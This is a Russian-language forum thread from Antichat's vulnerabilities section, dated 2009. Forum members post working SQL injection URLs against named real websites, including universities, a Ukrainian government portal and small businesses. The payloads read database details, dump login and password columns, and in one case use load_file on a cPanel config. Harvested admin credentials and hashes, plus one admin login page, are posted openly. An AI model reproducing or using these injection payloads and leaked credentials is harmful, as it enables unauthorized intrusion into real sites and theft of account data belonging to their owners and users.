ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8541  
Старый 24.03.2009, 21:21
Аватар для ph1l1ster
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

atlantic.edu

PR: 7

Код:
http://www.atlantic.edu/alumni/article.php?id=72+union+Select+1,aes_decrypt(aes_encrypt(concat(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7/*

Database Version: 4.1.12-log
Database name: www_alumni_news
User name: jdagosti@localhost

reslife.rit.edu

PR: 6

Код:
http://reslife.rit.edu/publications/opendoor/article.php?id=-72+union+select+1,concat(username,0x3a,password),3+from+users--

Database Version: 5.0.77
Database name: reslife
User name: reslife@sc3app09.rit.edu
 
Ответить с цитированием

  #8542  
Старый 24.03.2009, 21:50
Аватар для Metis
Metis
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме:
177127

Репутация: 29
По умолчанию

http://www.romaniincanada.org/

http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+secu rity_users-- (Пароли)

http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+securit y_users-- (Пользователи)

admin:ch8920an
thor:ch8920an


Database Version : 5.0.75-community-log
Database name: romaniin_retete
User Name : romaniin_admin@localhost
 
Ответить с цитированием

  #8543  
Старый 24.03.2009, 22:14
Аватар для Metis
Metis
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме:
177127

Репутация: 29
По умолчанию

http://www.lowcarbrecipes.org/

http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+securit y_users-- (Пользователи)

http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+secu rity_users-- (Пароли)

admin:8624266

Database Version : 5.0.67-community
Database name : recipedb
User Name : root@localhost
 
Ответить с цитированием

  #8544  
Старый 24.03.2009, 22:25
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
Thumbs up

Европа Плюс - Ваше любимое радио!

Код:
http://europaplus72.ru/index.php?go=full_afisha&id=-24+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6--
user(): srv11964_erpusr@c11-w.ht-systems.ru
database(): srv11964_erp
version(): 5.0.75-log

PR=3




FARM.RU :: Канцелярские и офисные товары

Код:
http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
user(): farm@zvm18.host.ru
database(): farm
version(): 4.0.27-log


тИЦ=275
PR=4


table users

Код:
http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users+limit+0,1--
login:рassword

PHP код:
Катерина:ubrfkuaf
IgorDorohov
:Dorohov_pas
lyumna
:p8yYpn
тринадцатый
:6kr176e8
sm
:12139 



MRC-modélisme

Код:
http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
user(): mrcmodelismecom@88.191.253.175
database(): mrcmodelismecom
version(): 5.0.45-Debian_1ubuntu3.3-log

PR=3

Код:
http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables+limit+0,1--
читаем таблицы.




ezo.hu - Főoldal

Код:
http://www.ezo.hu/index.php?id=24+and+substring(version(),1,1)=5--
5 ветка

PR=4




Официальный сайт института цитологии и генетики СО РАН

Код:
http://www.bionet.nsc.ru/cgi-bin/boardicg/catalog.pl?id=24+and+substring(version(),1,1)=5/*
5 ветка

тИЦ=1000
PR=5

Последний раз редактировалось z00MAN; 24.03.2009 в 22:27..
 
Ответить с цитированием

  #8545  
Старый 24.03.2009, 23:03
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 4.1.22
Database name : niihim_db
User name : niihim_mysql@10.1.39.197


админ :

Код:
http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,login,password),3,4,5+from+admin--
Код:
admin:niihim_w3
Код:
http://www.niihim.ru/admin/login.php
 
Ответить с цитированием

  #8546  
Старый 24.03.2009, 23:09
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.webaruhazak.net/cat.php?id=-50+union+select+1,2/*

Database Version: 4.1.14
Database name: wscenter
User name: wscenter@localhost

2 Metis

http://www.lowcarbrecipes.org тама и load_file

cpanel
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F637 0616E656C2F6370616E656C2E636F6E666967),0x7873716C6 96E6A656E64),0x71),0x71),3,4,5,6,7--

Последний раз редактировалось Rubaka; 24.03.2009 в 23:38..
 
Ответить с цитированием

  #8547  
Старый 25.03.2009, 00:04
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.jcp-pt.org/noticias.php?id=-420+union+select+1,2,3,version(),5,6,7/*&categoria=3&categoria2=0&categoria3=0


http://www.eduff.uff.br/noticias.php?id=-408+union+select+1,2,3,version()/*
 
Ответить с цитированием

  #8548  
Старый 25.03.2009, 00:19
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://kvs.gov.ua/info/news/news.php?id=17+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5/*
version():4.1.22
database():kvsgov
user():u_kvsgov@localhost
 
Ответить с цитированием

  #8549  
Старый 25.03.2009, 00:32
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.propertysalecenter.com/fullnews.php?id=-20+union+select+1,2,3,4,5--
Database Version: 5.0.75-community-log
Database name: manwomen_propertysalecenter
User name: manwomen_coy0@localhost

Последний раз редактировалось .:[melkiy]:.; 25.03.2009 в 00:44..
 
Ответить с цитированием

  #8550  
Старый 25.03.2009, 01:52
Аватар для ph1l1ster
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

threeoneg.com

Database Version: 5.0.45
Database name: threeone_catalog
User name: threeone_catalog@localhost

Код:
http://www.threeoneg.com/31G/shop.php?action=view&id=-17+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9

ravenfiles.com

Database Version: 4.1.22-standard
Database name: rgnmain1_ravenfiles
User name: rgnmain1_admin@localhost


Код:
http://www.ravenfiles.com/file.php?id=-14+union+Select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,0,11
expovest.ro

Database Version: 4.1.22-log
Database name: db16796
User name: u16796@81.28.232.69

Код:
http://www.expovest.ro/general_en/news.php?id=-173+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(user(),0x3a,version(),0x3a,database())

businessmachine.ro

Database Version: 5.0.45
Database name: bm
User name: bmadm@localhost

Код:
http://www.businessmachine.ro/afaceri/news.php?id=-51+union+select+1,concat(username,0x3a,userpass),3,4,5+from+users
gts-automatizari.ro

P.S: admin:21232f297a57a5a743894a0e4 (какой тип хэша?)

Database Version: 5.0.67-community-log
Database name: gtsautom_web
User name: gtsautom_web@localhost

Код:
http://www.gts-automatizari.ro/industrial-automation/news.php?lg=1&id=-51+union+select+1,2,3,4,concat(user,0x3a,passwd),6,concat(user,0x3a,passwd),8,9,0,1,2,3+from+gts_admin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ